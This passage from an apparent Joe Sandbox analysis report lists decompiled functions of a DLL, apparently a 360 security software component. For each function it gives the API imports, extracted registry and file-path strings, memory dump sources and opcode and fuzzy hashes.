                                                                  Function 000000018005619C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Path$AppendCloseFileModulememset$AddressExistsHandleHeapNameProcProcessQueryValue_wcsicmp
                                                                  • String ID: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360ExtHost.exe$safemon\360ExtHost.exe
                                                                  • API String ID: 1838183957-351904165
                                                                  • Opcode ID: 1e39c5d7731f9f0cfe2357af418d2a02b58939d64fc7587de7a383dead0b9532
                                                                  • Instruction ID: 01aece9f02afbb37390a2111cb2c5fee408a8cfe5dec439bdff79febd640f7a5
                                                                  • Opcode Fuzzy Hash: 1e39c5d7731f9f0cfe2357af418d2a02b58939d64fc7587de7a383dead0b9532
                                                                  • Instruction Fuzzy Hash: 27615132614A4892EBA1DB25E8543DA73A4FB8C7E4F448315BAAD436F5DF39C749CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180052160 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 78COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$CriticalDeleteSection
                                                                  • String ID: %s\NameSpace_Catalog5\Catalog_Entries64\%012d$%s\NameSpace_Catalog5\Catalog_Entries\%012d$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5
                                                                  • API String ID: 1297904149-2676930693
                                                                  • Opcode ID: 3d1b4d4945e0e21b4209534fb7adf2456145591c447b83fcd6c449b0aaaa6bb8
                                                                  • Instruction ID: 73cc0848a655b1fb88aa06a885314cf1e75da9385d723178a5cf1b8a64167aea
                                                                  • Opcode Fuzzy Hash: 3d1b4d4945e0e21b4209534fb7adf2456145591c447b83fcd6c449b0aaaa6bb8
                                                                  • Instruction Fuzzy Hash: F631F232741B4892EF668F25E4443DC63A0F74ABE0F588621EB5C07BA5CF39D5A9C300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180049164 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleProcess$OpenTokenWindow$DuplicateFindThread
                                                                  • String ID: Progman$Program manager
                                                                  • API String ID: 3967587520-2890643340
                                                                  • Opcode ID: ebbe5ced9ed42ff31fb37c6026852d3e1367768f1ce4ad74df982938cc8d9eb1
                                                                  • Instruction ID: dc0f1755b95b22890c5ec93f314443dee37f8d14911f95f63aa97c4fa7f5c449
                                                                  • Opcode Fuzzy Hash: ebbe5ced9ed42ff31fb37c6026852d3e1367768f1ce4ad74df982938cc8d9eb1
                                                                  • Instruction Fuzzy Hash: 51217F35706B0982EF968B55EC943E563A0FB8C7D4F158125EA5A06BB4DF7CC78C8704
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018003A8D4 Relevance: 16.6, APIs: 11, Instructions: 87libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A907
                                                                  • FindResourceW.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A91F
                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A933
                                                                  • LoadResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A942
                                                                  • LockResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A953
                                                                  • malloc.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A964
                                                                  • memmove.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A97B
                                                                  • FreeResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A983
                                                                  • FreeLibrary.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A98C
                                                                  • VerQueryValueW.VERSION(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A9B4
                                                                  • free.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A9D9
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FreeLibraryLoad$FindLockQuerySizeofValuefreemallocmemmove
                                                                  • String ID:
                                                                  • API String ID: 3317409091-0
                                                                  • Opcode ID: d575d481ff84caad7d8740059adda23fe9f9648e66c4b8f54cfb60a62ec78070
                                                                  • Instruction ID: 8185c375a913dccbf35fde3c3455573a2fd048fb7f01b55c3a130ccbeb9ebe14
                                                                  • Opcode Fuzzy Hash: d575d481ff84caad7d8740059adda23fe9f9648e66c4b8f54cfb60a62ec78070
                                                                  • Instruction Fuzzy Hash: 09316B35606B4886EA86DF16AC0479AB3E4BB4DFC0F0A8426AE4907764EF3CD649C700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180019044 Relevance: 16.6, APIs: 11, Instructions: 86libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FreeLibraryLoad$FindLockQuerySizeofValuefreemallocmemmove
                                                                  • String ID:
                                                                  • API String ID: 3317409091-0
                                                                  • Opcode ID: c78e14dcb0124c7fdfddeb6e32502328b3625422cacc1ce2de84f055e235b1f2
                                                                  • Instruction ID: 7be624b5aba991f8dce8e488531e7c4bc30f0810fde0e2206e2c198a200c07cc
                                                                  • Opcode Fuzzy Hash: c78e14dcb0124c7fdfddeb6e32502328b3625422cacc1ce2de84f055e235b1f2
                                                                  • Instruction Fuzzy Hash: F5316D31702B448AEB87DF6AA84479977E0BB4CFD4F098425AE0907764EF38D64AC700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018003F070 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Valuememset$CloseEnumOpen
                                                                  • String ID: stat
                                                                  • API String ID: 3313869694-548994849
                                                                  • Opcode ID: 021697519deb37d11cec93fa9a5ab951d19f885d93b4615a5ee70ee1a279cb79
                                                                  • Instruction ID: bca1fd9f3236c41ce4b8b5e5b78ce057e793223580287a74ffbbd9e6a5e702b7
                                                                  • Opcode Fuzzy Hash: 021697519deb37d11cec93fa9a5ab951d19f885d93b4615a5ee70ee1a279cb79
                                                                  • Instruction Fuzzy Hash: 4E616076614A8896D7A2CF25E4403DB77A4F7897D4F518216EB9C43BA8DF39C609CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180066A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: memset$CloseCommandExecuteFileHandleLineModuleNameShell
                                                                  • String ID: /elevated$MPR.dll$runas
                                                                  • API String ID: 3400839104-479190379
                                                                  • Opcode ID: ff0e70aebe942903d03514da05f5171b976ef8719cbab5a1757af81890fa035d
                                                                  • Instruction ID: c5738ef19aefcfe0893ce15e6bbb4f81d570db0aa822fd902f1c1618a14612e4
                                                                  • Opcode Fuzzy Hash: ff0e70aebe942903d03514da05f5171b976ef8719cbab5a1757af81890fa035d
                                                                  • Instruction Fuzzy Hash: 35518F32611B4481EB919B29D85039A73A5FB88BF4F108316FABE437E4DF38C649C740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180028C8C Relevance: 15.2, APIs: 10, Instructions: 235COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FromString_wcsupr$HeapProcess
                                                                  • String ID:
                                                                  • API String ID: 2249050647-0
                                                                  • Opcode ID: af4d7778e813cec4d2260f242f830c925d5e0839e1a4af0d89802f64c8607ec2
                                                                  • Instruction ID: c2b84f69b377f8d486519554b3a5ef31eab8a077f1ecb1a3c09cbb62b7b5dce0
                                                                  • Opcode Fuzzy Hash: af4d7778e813cec4d2260f242f830c925d5e0839e1a4af0d89802f64c8607ec2
                                                                  • Instruction Fuzzy Hash: A5A19E36302A4881EBE79F15D8403E963A1FB58BD4F45C116EA5E5B6E9DF38CB89D300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00000001800421D4 Relevance: 15.2, APIs: 10, Instructions: 163networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharCriticalMultiSectionWidehtonlhtons$EnterLeavememmove
                                                                  • String ID:
                                                                  • API String ID: 505489203-0
                                                                  • Opcode ID: a07653937a79e70b2ab9cb09c4e22017cd899243124cbf7044e450a9eefd8b59
                                                                  • Instruction ID: 546e40b67bc81cdcf22b9085e67948acfa9500907e31d87aed3a5e4506fe483b
                                                                  • Opcode Fuzzy Hash: a07653937a79e70b2ab9cb09c4e22017cd899243124cbf7044e450a9eefd8b59
                                                                  • Instruction Fuzzy Hash: A6711C32B05B548AFB96CFA1E8403ED33B5B70879DF468025EE5627A98DF38C659C344
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180052280 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 220COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %s\NameSpace_Catalog5\Catalog_Entries64\%012d$%s\NameSpace_Catalog5\Catalog_Entries\%012d$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5
                                                                  • API String ID: 0-1196714001
                                                                  • Opcode ID: 568fd741c3bdcc21c426c5afc4ac46b45918c5554304f1a676603b4f6589036a
                                                                  • Instruction ID: 902fc08f0a24e927d00bac490aa4b2e4fc0ab2cffff010c51715f7c20a33671b
                                                                  • Opcode Fuzzy Hash: 568fd741c3bdcc21c426c5afc4ac46b45918c5554304f1a676603b4f6589036a
                                                                  • Instruction Fuzzy Hash: 8B91E232701B4886EB96CB62A8407D973A0FB8DBD4F058225BF6D17795EF39CA49C700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018002C720 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 217COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: String$??3@FreeFromHeapProcess_wcsupr_wtoi
                                                                  • String ID: hotkey$internetshortcut
                                                                  • API String ID: 2885337837-1159320594
                                                                  • Opcode ID: a2454b8e8b8246686a3b2ba7e9ac3c3560326eba55912cdd4e74c1efac8119ef
                                                                  • Instruction ID: 4557ede77b3344c9b7d134b2ef366cc1eba795b6e68afc4d6349487d3a9816dc
                                                                  • Opcode Fuzzy Hash: a2454b8e8b8246686a3b2ba7e9ac3c3560326eba55912cdd4e74c1efac8119ef
                                                                  • Instruction Fuzzy Hash: 56915972701B4886EB96DF69D84079D33A0F748BE4F44C626AA6D477E4DF38CA99C340
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018003AA00 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 156sleepthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentSleepThread
                                                                  • String ID: JudgeVersion
                                                                  • API String ID: 1164918020-3141317846
                                                                  • Opcode ID: 2437360cf512e5b62a46a09ef29253c79db304fd769a9f3e4dce4e3854d29d87
                                                                  • Instruction ID: 47c15e1018a900855fb3b169089698e2b9417bb7c9542535bb0a2760737ebbf6
                                                                  • Opcode Fuzzy Hash: 2437360cf512e5b62a46a09ef29253c79db304fd769a9f3e4dce4e3854d29d87
                                                                  • Instruction Fuzzy Hash: EE51AB32604A889AFB979F65DD843DE73A1F3097D4F468525EA2A83790DF34CA99C340
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018005E750 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152filesynchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesDeleteErrorLast$MutexRelease
                                                                  • String ID: PRAGMA synchronous = OFF;
                                                                  • API String ID: 874664252-1854902270
                                                                  • Opcode ID: 1145e7b794f1c9dbefaeeafce65ce3907897fb728955ac70424f53ad1c5898c9
                                                                  • Instruction ID: fa77642fd0660764f5a509da37546a8681fbf34ddf7b90f5fa11f8d2a21f9c13
                                                                  • Opcode Fuzzy Hash: 1145e7b794f1c9dbefaeeafce65ce3907897fb728955ac70424f53ad1c5898c9
                                                                  • Instruction Fuzzy Hash: 6551A335700B8996FEDE8F6594517B92390AB4DBD4F048524BEAE677E0DF35CA098300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00000001800570A0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: File$Path$Exists$ModuleNameRemoveSpecmemset
                                                                  • String ID: %hd.%hd.%hd.%hd$\360ver.dll$\QHVer.dll
                                                                  • API String ID: 3680197243-1037704697
                                                                  • Opcode ID: 3e80556d967b03fa81a8d0e192ef84c8c157516f2ebd988b45dcbe8060877e80
                                                                  • Instruction ID: 3305af636dff0720fe62b84610ade698e39c861821be0ce054630d245facfc05
                                                                  • Opcode Fuzzy Hash: 3e80556d967b03fa81a8d0e192ef84c8c157516f2ebd988b45dcbe8060877e80
                                                                  • Instruction Fuzzy Hash: 73516572701A4982E751DB29D84078A77A0F789BF4F408212FA6D877E5DF39CA49CB40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180044568 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 146COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@CriticalSection$??3@Deleterand$CountInitializeTickmemsetsrand
                                                                  • String ID: http://%s/dquery
                                                                  • API String ID: 3689213441-2489601265
                                                                  • Opcode ID: 3d6c1d3a1db6c1d00b31d5721a07cc2654ec57c957b64071c42c049315398c83
                                                                  • Instruction ID: 80c6b5da0a524930356cbb69355e12e6cacd4ac9a253962bc35af1aeed2dd264
                                                                  • Opcode Fuzzy Hash: 3d6c1d3a1db6c1d00b31d5721a07cc2654ec57c957b64071c42c049315398c83
                                                                  • Instruction Fuzzy Hash: F3619076211F4986E7829B64EC843D933A0FB497A8F518316ED29076E5EF78C78DC344
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018005ECC0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 86COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: File$Path$CriticalExistsModuleNameSection$AppendCloseControlCreateCurrentDeviceEnterHandleLeaveProcessmemset
                                                                  • String ID: \Config\MessageCenter.db$\deepscan\heavygate64.dll$\heavygate64.dll
                                                                  • API String ID: 830827343-1853890022
                                                                  • Opcode ID: 298258ffcac91158a1fef4f3201ca6457f5d35ecb6e0b41006b5da1b8766b288
                                                                  • Instruction ID: ed8f6b5c495fe7c06dfc5e892af335cc1c0a2688f7bbfb93a7c5ae832a2d3b97
                                                                  • Opcode Fuzzy Hash: 298258ffcac91158a1fef4f3201ca6457f5d35ecb6e0b41006b5da1b8766b288
                                                                  • Instruction Fuzzy Hash: 12413B72214A8995EBB5DF21EC413D92360F7897C8F808112FA4D9B5A9DF39C70DCB40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

